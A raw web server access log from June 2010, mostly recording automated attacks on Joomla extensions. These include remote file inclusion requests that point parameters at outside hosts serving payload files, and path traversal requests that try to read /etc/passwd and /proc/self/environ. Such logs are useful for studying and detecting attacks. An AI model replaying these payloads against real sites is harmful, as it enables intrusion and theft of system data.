64.151.192.11 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.227.218.240 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:41 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:41 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
64.151.192.11 - - [01/Jun/2010:03:53:41 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.145.108.230 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/access_log.1274832000%20%20/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.151.192.11 - - [01/Jun/2010:03:53:41 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.145.108.230 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.151.192.11 - - [01/Jun/2010:03:53:41 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.174.120.20 - - [01/Jun/2010:03:53:42 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:42 -0500] "GET /logs/access_log.1274832000%20%20/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:42 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:42 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:42 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:42 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:43 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:44 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:44 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:44 -0500] "GET /logs/access_log.1274832000%20%20/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:44 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:44 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:47 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:47 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:53:47 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:49 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:49 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:50 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:53 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:53 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:53:53 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:53:54 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:53:54 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:53:54 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:55 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:55 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:53:57 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:53:57 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:53:57 -0500] "GET /logs/access_log.1274832000%20%20/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:53:58 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:54:02 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:54:02 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:54:03 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:54:33 -0500] "GET /logs/access_log.1274227200//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.227.218.240 - - [01/Jun/2010:03:55:01 -0500] "GET /logs/access_log.1271462400/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:55:01 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.227.218.240 - - [01/Jun/2010:03:55:01 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:03:55:12 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:03:55:13 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:03:55:13 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
93.174.120.20 - - [01/Jun/2010:03:55:17 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:55:17 -0500] "GET /logs/access_log.1271462400/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:55:17 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:03:55:18 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
89.145.108.230 - - [01/Jun/2010:03:55:18 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:55:21 -0500] "GET /logs/access_log.1271462400/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:55:21 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.6.16 - - [01/Jun/2010:03:55:21 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:03:55:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
89.145.108.230 - - [01/Jun/2010:03:55:23 -0500] "GET /logs/access_log.1271462400/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.145.108.230 - - [01/Jun/2010:03:55:23 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:03:55:23 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
93.174.120.20 - - [01/Jun/2010:03:55:23 -0500] "GET /logs/access_log.1271462400/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:55:23 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:03:55:23 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:03:55:24 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:03:55:51 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
118.129.166.213 - - [01/Jun/2010:03:55:51 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.177.125 - - [01/Jun/2010:03:56:55 -0500] "GET /logs/access_log.1271462400/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:56:56 -0500] "GET /logs/?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:03:56:56 -0500] "GET /?option=com_redshop&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:03:57:43 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:57:43 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:57:44 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.13.131 - - [01/Jun/2010:03:57:56 -0500] "GET /logs/access_log.1208822400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.191 - - [01/Jun/2010:03:58:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.8.3.157 - - [01/Jun/2010:03:58:58 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
64.151.192.11 - - [01/Jun/2010:04:00:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:04:00:23 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:04:00:23 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
222.236.47.182 - - [01/Jun/2010:04:00:23 -0500] "GET /logs/access_log.1272326400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.22.87.208 - - [01/Jun/2010:04:01:45 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.22.87.208 - - [01/Jun/2010:04:01:46 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
222.236.47.182 - - [01/Jun/2010:04:02:56 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:02:56 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:02:56 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:04:04:14 -0500] "GET /logs/index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:04:14 -0500] "GET /logs/index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:04:14 -0500] "GET /index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:04:14 -0500] "GET /index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
222.236.47.182 - - [01/Jun/2010:04:04:22 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:04:22 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:04:22 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.115.111.248 - - [01/Jun/2010:04:04:44 -0500] "GET /logs/access_log.1262822400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:04:47 -0500] "GET /logs/access_log.1263081600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:04:49 -0500] "GET /logs/access_log.1263168000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:04:51 -0500] "GET /logs/access_log.1263859200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:04:54 -0500] "GET /logs/access_log.1264723200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
222.236.47.182 - - [01/Jun/2010:04:04:54 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:04:54 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:04:54 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.115.111.248 - - [01/Jun/2010:04:04:56 -0500] "GET /logs/access_log.1264809600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:04:59 -0500] "GET /logs/access_log.1265241600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:05:01 -0500] "GET /logs/access_log.1268265600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jun/2010:04:05:04 -0500] "GET /logs/access_log.1268611200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
222.236.47.182 - - [01/Jun/2010:04:07:22 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.180.195 - - [01/Jun/2010:04:07:34 -0500] "GET /logs/index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:34 -0500] "GET /index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:39 -0500] "GET /logs/index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:39 -0500] "GET /index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:40 -0500] "GET /logs/index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:40 -0500] "GET /index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:43 -0500] "GET /logs/index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:04:07:43 -0500] "GET /index.php?option=com_videodb&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
222.236.47.182 - - [01/Jun/2010:04:10:03 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [01/Jun/2010:04:10:22 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
199.120.90.223 - - [01/Jun/2010:04:11:15 -0500] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
199.120.90.223 - - [01/Jun/2010:04:11:15 -0500] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
199.120.90.223 - - [01/Jun/2010:04:11:15 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
199.120.90.223 - - [01/Jun/2010:04:11:26 -0500] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
199.120.90.223 - - [01/Jun/2010:04:11:27 -0500] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
199.120.90.223 - - [01/Jun/2010:04:11:27 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
173.203.115.77 - - [01/Jun/2010:04:11:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [01/Jun/2010:04:11:37 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [01/Jun/2010:04:11:37 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.128.84.14 - - [01/Jun/2010:04:15:11 -0500] "GET /logs/access_log.1274227200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
213.128.84.14 - - [01/Jun/2010:04:15:11 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
213.128.84.14 - - [01/Jun/2010:04:15:11 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
